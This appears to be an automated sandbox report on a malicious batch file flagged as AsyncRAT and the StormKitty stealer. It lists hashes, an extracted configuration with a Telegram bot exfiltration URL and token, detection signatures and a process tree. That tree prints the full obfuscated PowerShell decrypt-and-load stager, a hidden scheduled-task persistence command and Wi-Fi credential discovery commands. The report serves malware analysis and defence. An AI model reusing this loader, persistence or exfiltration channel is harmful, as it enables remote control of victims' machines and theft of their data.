Overview

overview

10

Static

static

1

po.bat

windows7-x64

6

po.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-12-2024 16:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    po.bat

  • Size

    345KB

  • MD5

    25be610e8e3814d3a218e6ab74513af2

  • SHA1

    e94d8a8adbf9b42ee206ae0cea46b2d24225e9fc

  • SHA256

    b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11

  • SHA512

    201988cc2a36782c841e258160df4ec8d6ecafb8534d2868edbfd827de10e671b38df849f7c97686201fe0d6fb69d147d42b642f4cb6224705eb2a586b2c0235

  • SSDEEP

    6144:GR5FF+fw1uneHT10sG94hEHdiYOGgmNUgd/RZkOXTGKiTGtiIljFiqzpQJK:05j1unET1zG4E9FgmNUgd/PkOXniTeQw

Score
10/10
asyncratstormkittydefaultdiscoveryexecutionpersistencephishingprivilege_escalationratstealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7783849752:AAGmjKBCU097MimSymLmRKxeBKFEEvQt3kM/sendMessage?chat_id=6795436266
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • A potential corporate email address has been identified in the URL: WorldWindProResultsDate2024123142242PMSystemWindows10Pro64BitUsernameAdminCompNameHGNBWBGWLanguageenUSAntivirusNotinstalledHardwareCPU12thGenIntelRCoreTMi512400GPUMicrosoftBasicDisplayAdapterRAM16154MBHWIDUnknownPowerNoSystemBattery1Screen1280x720NetworkGatewayIP10.127.0.1InternalIP10.127.1.46ExternalIP181.215.176.83BSSID0a07a41c5f8cDomainsinfoBankLogsNodataCryptoLogsNodataFreakyLogsNodataLogsBookmarks5SoftwareDeviceWindowsproductkeyDesktopscreenshotFileGrabberDatabasefiles6TelegramChannel@XSplinter
    phishing
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops desktop.ini file(s) 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\po.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('23MdSkcOxWCbD/Koba3sUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eeiaa=New-Object System.IO.MemoryStream(,$param_var); $IalBQ=New-Object System.IO.MemoryStream; $RfJeN=New-Object System.IO.Compression.GZipStream($Eeiaa, [IO.Compression.CompressionMode]::Decompress); $RfJeN.CopyTo($IalBQ); $RfJeN.Dispose(); $Eeiaa.Dispose(); $IalBQ.Dispose(); $IalBQ.ToArray();}function execute_function($param_var,$param2_var){ $HWfkf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TJqdd=$HWfkf.EntryPoint; $TJqdd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\po.bat';$mWxXN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\po.bat').Split([Environment]::NewLine);foreach ($QlAdB in $mWxXN) { if ($QlAdB.StartsWith(':: ')) { $LjOms=$QlAdB.Substring(3); break; }}$payloads_var=[string[]]$LjOms.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_899_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_899.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:576
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_899.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_899.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1756
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WXDDP3eCzIksUfspz4NHfGBtlF74ozognZ5SfO7Zxkw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('23MdSkcOxWCbD/Koba3sUw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Eeiaa=New-Object System.IO.MemoryStream(,$param_var); $IalBQ=New-Object System.IO.MemoryStream; $RfJeN=New-Object System.IO.Compression.GZipStream($Eeiaa, [IO.Compression.CompressionMode]::Decompress); $RfJeN.CopyTo($IalBQ); $RfJeN.Dispose(); $Eeiaa.Dispose(); $IalBQ.Dispose(); $IalBQ.ToArray();}function execute_function($param_var,$param2_var){ $HWfkf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TJqdd=$HWfkf.EntryPoint; $TJqdd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_899.bat';$mWxXN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_899.bat').Split([Environment]::NewLine);foreach ($QlAdB in $mWxXN) { if ($QlAdB.StartsWith(':: ')) { $LjOms=$QlAdB.Substring(3); break; }}$payloads_var=[string[]]$LjOms.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops desktop.ini file(s)
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1196
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
              6⤵
              • System Network Configuration Discovery: Wi-Fi Discovery
              • Suspicious use of WriteProcessMemory
              PID:2268
              • C:\Windows\system32\chcp.com
                chcp 65001
                7⤵
                  PID:1552
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  7⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:3024
                • C:\Windows\system32\findstr.exe
                  findstr All
                  7⤵
                    PID:4200
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5108
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    7⤵
                      PID:2456
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show networks mode=bssid
                      7⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4836

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\858b037c9991c1287bcbc54bdc9c6d9d\msgid.dat
          Filesize

          1B

          MD5

          cfcd208495d565ef66e7dff9f98764da

          SHA1

          b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

          SHA256

          5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

          SHA512

          31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

          Download Submit

        • C:\Users\Admin\AppData\Local\8648dd9006ccc12c10d4ef0a8c8cd3b5\Admin@HGNBWBGW_en-US\System\Process.txt
          Filesize

          2KB

          MD5

          b438e4a0d772d94bf96c3243a0df4383

          SHA1

          9465de57c99716655278ee9a76d82fe8fad5f9e2

          SHA256

          aa0fbe1de03d52ff0a42c14e42e8e2c6ef237a6c1968b6e2247c1c3209ed57ce

          SHA512

          f2f7dbe29b4b2d06fac2d06a7b5644db6441c7f93b3ad8d8a0b84aa3dc0d3fa859cf4f047eae0fa7992ff1a1d936b62460aaef7e1e5fe69ca6e83d55e424a2c9

          Download Submit

        • C:\Users\Admin\AppData\Local\8648dd9006ccc12c10d4ef0a8c8cd3b5\Admin@HGNBWBGW_en-US\System\Process.txt
          Filesize

          3KB

          MD5

          3d7eb2443ed447df8a16bf409ec39014

          SHA1

          93ad136d29119641c24162c8210b8117837efa8f

          SHA256

          e8861e4c0c3484540b7c1de6362a035fa9f777a54fdef116aa3c022c83b820f5

          SHA512

          1d16afc878ed977fea3c9bc1239af2c1a0522f0f29841f0510ccea176ca10fef33aaf2b83c3775681acc2ebdb778a8c6a2fb3423d90d406295ad4fb6d2ae2e9b

          Download Submit

        • C:\Users\Admin\AppData\Local\8648dd9006ccc12c10d4ef0a8c8cd3b5\Admin@HGNBWBGW_en-US\System\Process.txt
          Filesize

          4KB

          MD5

          297df5930891848e3bf28b29cf16540e

          SHA1

          cdcdd635f3f41ef7e3176416d42e97867fb2892f

          SHA256

          6a90194d862f1f2768d59185e8c2eab1c16b4f3370154dd9a69ffd44198fb765

          SHA512

          7b8aece9b2242bbf7441b04415dfe491dee9284aad9e298b476133d73bb652496208c17bf7de0d42749423afc8557006f82f2503eb7dd34ce4c3fa90926aeb1c

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          661739d384d9dfd807a089721202900b

          SHA1

          5b2c5d6a7122b4ce849dc98e79a7713038feac55

          SHA256

          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

          SHA512

          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          59e72d5302c306143345e8298d925ba8

          SHA1

          78c0a2e28a58b4dd3dc53c2a94cb10cf9bc20e24

          SHA256

          ab87b07ec3ba128e25f3a690e5ec78dc0c0ae5f5ce01325badc0fb0e63281217

          SHA512

          777a30da4f1e81fbc74ef68d7c35def1ef4204e876477ff16ee23ffccf245f95ff826844795c032cb8eda698f02c3d6a7595ca377331704f43af26f6ac824f3c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fuyeprcw.ez0.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\startup_str_899.bat
          Filesize

          345KB

          MD5

          25be610e8e3814d3a218e6ab74513af2

          SHA1

          e94d8a8adbf9b42ee206ae0cea46b2d24225e9fc

          SHA256

          b1d4310181ae2f48593c1fe2c68f71e6dd39c5f64254fd21304debb944bd1b11

          SHA512

          201988cc2a36782c841e258160df4ec8d6ecafb8534d2868edbfd827de10e671b38df849f7c97686201fe0d6fb69d147d42b642f4cb6224705eb2a586b2c0235

          Download Submit

        • C:\Users\Admin\AppData\Roaming\startup_str_899.vbs
          Filesize

          115B

          MD5

          b52a50d4970f4906c23bb743dd4713b2

          SHA1

          b568f1d0cc97b7bb90b4df540eeded5adacb3d47

          SHA256

          85df88a9f0b897917441285e1220d63beae23fd6d9aa75ccb2e1c7a05d3464d6

          SHA512

          93559599842eb54ba2abb095d7d3777579d9e2f47bc37de85f709548e25123264098a12c974e87f8f56359d19d1885048cfebe6c913b4ce5071a139309fa8302

          Download Submit

        • memory/112-50-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/112-14-0x000001E2ADEF0000-0x000001E2ADF34000-memory.dmp

          Filesize

          272KB

          Download

        • memory/112-8-0x000001E2AD2C0000-0x000001E2AD2E2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/112-13-0x000001E2AD310000-0x000001E2AD318000-memory.dmp

          Filesize

          32KB

          Download

        • memory/112-11-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/112-0-0x00007FFEAA393000-0x00007FFEAA395000-memory.dmp

          Filesize

          8KB

          Download

        • memory/112-12-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/576-27-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/576-30-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/576-26-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/576-16-0x00007FFEAA390000-0x00007FFEAAE51000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1196-51-0x000001F173590000-0x000001F1735C2000-memory.dmp

          Filesize

          200KB

          Download

        • memory/1196-49-0x000001F15A7C0000-0x000001F15A804000-memory.dmp

          Filesize

          272KB

          Download

        • memory/1196-198-0x000001F173FC0000-0x000001F173FCA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/1196-204-0x000001F173FD0000-0x000001F173FE2000-memory.dmp

          Filesize

          72KB

          Download